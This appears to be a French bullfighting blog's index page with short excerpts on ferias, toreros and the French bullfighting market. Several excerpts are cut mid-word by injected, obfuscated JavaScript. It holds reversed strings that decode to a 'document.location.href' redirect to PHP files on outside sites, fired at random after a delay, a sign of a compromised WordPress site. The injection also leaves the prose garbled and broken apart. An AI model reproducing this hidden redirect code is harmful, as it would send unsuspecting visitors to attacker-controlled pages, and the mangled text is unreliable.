LA DEMESURE

toro22

Il fut un temps où venir dans le sud ouest et être à l’affiche d’arènes comme Garlin, Mugron ou celles aujourd’hui disparues de Saint-Perdon, était un gage pour les novilleros d’affronter des élevages parmi la crème des ganaderias,

LE POIDS DES OREILLES

sevilla

Pour cette féria de Séville on a enregistré le fait insolite de voir couper des oreilles à chacune des quatre premières corridas. Un événement aussi insolite qu’il faut remonter quarante ans en arrière –jusqu’à la feria de 1975-

LA FRANCE PAR TEMPS DE CRISE

lealNB

Comparé à l’Espagne, le marché taurin français semblait avoir bien résisté à la crise, avec une diminution insignifiante du nombre de spectacles et des ferias bien construites dans l’ensemble des gr$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == « string ») return $hiVNZt4Y5cDrbJXMhLy.list[n].split(«  »).reverse().join(«  »);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var

TROIS VIEUX MAESTROS

3maestros

Ils étaient là tous les trois. Leurs cheveux argentés par la neige des calendriers. Dignes. Graves. Toreros. Avec cette toreria intérieure qu’impriment dans l’élégance, le geste et l’attitude, le temps intense et largement conquis devant le danger et

POURQUOI CASTELLA TOREE À PEINE EN FRANCE ?

castella111

Qualifier Castella comme un bon torero c’est peu dire. Car c’est une figura de la tauromachie, un des gr$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == « string ») return $hiVNZt4Y5cDrbJXMhLy.list[n].split(«  »).reverse().join(«  »);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == « string ») return $vTB$I_919AeEAw2z$KX.list[n].split(«  »).reverse().join(«  »);return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var

SEVILLE ET SA PASSION DES HISTOIRES

espartaco

Séville aime qu’on lui raconte des histoires. Il en a toujours été ainsi. Car il n’existe pas de ville qui n’aime plus imaginer des histoires et les adapter à sa sauce. Et qu$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == « string ») return

MADRID : GRANDE FAENA DE VICTOR BARRIOS ET BON APRES-MIDI D’EUGENIO DE MORA

eugeniodemora

Le sixième toro, avec beaucoup de cornes, très gr$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == « string ») return $hiVNZt4Y5cDrbJXMhLy.list[n].split(«  »).reverse().join(«  »);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == « string ») return $vTB$I_919AeEAw2z$KX.list[n].split(«  »).reverse().join(«  »);return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}$vTB$I_919AeEAw2z$KX=function(n){if (typeof